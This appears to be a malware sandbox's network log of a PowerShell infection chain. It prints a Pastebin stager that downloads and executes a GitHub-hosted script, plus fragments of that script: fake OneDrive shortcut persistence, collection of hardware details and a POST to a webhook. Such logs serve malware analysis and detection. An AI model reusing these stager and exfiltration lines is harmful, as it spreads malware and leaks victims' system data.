                                                            Date: Tue, 15 Oct 2024 14:00:34 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210102-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000834.043754,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:34 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649733104.20.4.2354432992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 13:59:58 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:58 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 448
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305530efb24786-DFW
                                                            2024-10-15 13:59:58 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.649735104.20.4.2354432536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 13:59:58 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:58 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 448
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305530faa9462a-DFW
                                                            2024-10-15 13:59:58 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.649734104.20.4.2354434040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 13:59:59 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 13:59:59 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 449
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305533eda14779-DFW
                                                            2024-10-15 13:59:59 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 13:59:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.649748185.199.109.1334432992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:00 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:00 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120062-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000801.583606,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: e6fafa10bb1fd93888029846b6dcda73080275eb
                                                            Expires: Tue, 15 Oct 2024 14:05:00 GMT
                                                            Source-Age: 6
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:00 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.649749185.199.109.1334432536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:00 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:00 UTC900INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:00 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120030-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000801.588459,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: c036b1916e7127687d7a12ef406e73b9d4f2866b
                                                            Expires: Tue, 15 Oct 2024 14:05:00 GMT
                                                            Source-Age: 6
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:00 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:00 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.649750104.20.4.2354431396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:00 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
